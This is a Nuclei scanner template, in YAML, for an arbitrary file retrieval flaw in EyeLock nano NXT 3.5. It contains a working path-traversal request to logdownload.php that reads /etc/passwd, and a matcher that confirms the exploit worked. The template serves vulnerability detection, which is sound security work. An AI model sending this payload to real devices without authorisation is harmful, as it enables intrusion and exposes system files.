nuclei-templates/http/vulnerabilities/other/eyelock-nano-lfd.yaml

29 lines
852 B
YAML
Raw Normal View History

2021-08-16 10:42:45 +00:00
id: eyelock-nano-lfd
info:
name: EyeLock nano NXT 3.5 - Arbitrary File Retrieval
2021-08-16 10:42:45 +00:00
author: geeknik
severity: high
description: EyeLock nano NXT suffers from a file retrieval vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This
can be exploited to disclose contents of files from local resources.
reference:
- https://www.zeroscience.mk/codes/eyelock_lfd.txt
2021-08-16 11:10:42 +00:00
tags: iot,lfi,eyelock
metadata:
max-request: 1
2021-08-16 10:42:45 +00:00
http:
2021-08-16 10:42:45 +00:00
- method: GET
path:
- "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body